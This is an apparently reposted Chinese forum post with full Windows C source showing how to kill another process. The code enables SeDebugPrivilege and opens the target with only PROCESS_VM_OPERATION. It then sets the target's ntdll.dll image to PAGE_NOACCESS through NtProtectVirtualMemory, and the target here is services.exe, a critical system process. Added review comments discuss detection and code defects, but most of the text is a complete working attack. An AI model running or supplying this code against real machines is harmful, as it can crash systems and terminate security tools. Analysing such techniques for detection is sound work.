
【转】利用NtProtectVirtualMemory结束进程

标题:【原创】利用NtProtectVirtualMemory结束进程 作者:KiDebug 时间:2011-07-13 09:37:08 链接:http://bbs.pediy.com/showthread.php?t=137067 原理很简单:用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问。
/**
 * Author:   KiDebug
 * Homepage: http://hi.baidu.com/KiDebug/
 * If this fails to build under VC 6.0, search for "vc 6.0 unicode".
 *
 * Demonstrates terminating a process by changing the page protection of
 * its ntdll.dll image to PAGE_NOACCESS from another process. Only
 * PROCESS_VM_OPERATION is requested on the target, not PROCESS_ALL_ACCESS.
 *
 * NOTE(review): from a defender's side, the two observable events are the
 * cross-process handle open on the target (access mask PROCESS_VM_OPERATION)
 * and a remote protection change covering another process's image range;
 * process-access auditing catches the former. Running the target as a
 * protected process presumably blocks the OpenProcess call — confirm.
 */
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>

#pragma comment(lib,"Psapi.lib")

/* Undocumented ntdll export resolved at runtime (see main). Enables or
 * disables a privilege by its numeric LUID value on the process or thread
 * token. */
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(ULONG Privilege,BOOLEAN Enable,BOOLEAN CurrentThread,PBOOLEAN Enabled);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;

/* Native counterpart of VirtualProtectEx, also resolved at runtime. Note
 * that BaseAddress and RegionSize are in/out: the kernel rounds them to
 * page boundaries and writes the adjusted values back. */
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __inout PSIZE_T RegionSize,
    __in ULONG NewProtectWin32,
    __out PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;

/*
 * Return the PID of the first running process whose image name matches
 * `proc` (case-insensitive), or 0 if none is found or the snapshot fails.
 *
 * NOTE(review): CreateToolhelp32Snapshot reports failure with
 * INVALID_HANDLE_VALUE, which is non-zero, so `if (hSnapshot)` does not
 * catch it; CloseHandle is also reached on the failure path.
 */
ULONG GetPID(WCHAR* proc)
{
    BOOL                working = 0;
    PROCESSENTRY32      lppe = { 0 };
    ULONG               targetPid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnapshot)
    {
        /* dwSize must be set before the first Process32First call. */
        lppe.dwSize = sizeof(lppe);
        working = Process32First(hSnapshot, &lppe);
        while (working)
        {
            if (_wcsicmp(lppe.szExeFile, proc) == 0)
            {
                targetPid = lppe.th32ProcessID;
                break;
            }
            working = Process32Next(hSnapshot, &lppe);
        }
    }

    CloseHandle(hSnapshot);
    return targetPid;
}

/*
 * Entry point. Every failure path returns silently without any output.
 *
 * NOTE(review): `void main()` is non-standard C; `int main(void)` is the
 * portable form. The process handle `hProc` is never closed, and the
 * NTSTATUS returned by NtProtectVirtualMemory is discarded, so the caller
 * never learns whether the protection change was applied.
 */
void main()
{
    HMODULE     ntdll;
    MODULEINFO  ModuleInfo;
    /* Base and size of ntdll.dll are queried in *this* process via the
     * current-process pseudo-handle (HANDLE)-1. The same range is later
     * applied to the remote process, which assumes ntdll is mapped at the
     * same address in both — presumably true per boot session; verify. */
    ntdll = GetModuleHandle(L"ntdll.dll");
    if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))
    {
        return;
    }

    BOOLEAN         Enabled;
    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    if (RtlAdjustPrivilege == NULL)
    {
        return;
    }

    /* Privilege value 20 is SeDebugPrivilege; CurrentThread=FALSE enables it
     * on the process token. The result is not checked, so a caller without
     * this privilege simply fails later at OpenProcess. */
    RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);

    /* Only PROCESS_VM_OPERATION is requested — the minimum needed for a
     * protection change, and the access mask a detection rule would key on. */
    HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));
    if (hProc == NULL)
    {
        return;
    }

    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (NtProtectVirtualMemory == NULL)
    {
        return;
    }

    /* Remote protection change over the whole ntdll image; lpBaseOfDll and
     * SizeOfImage are passed by address because the call may adjust them. */
    ULONG   OldProtect;
    NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);
}

 
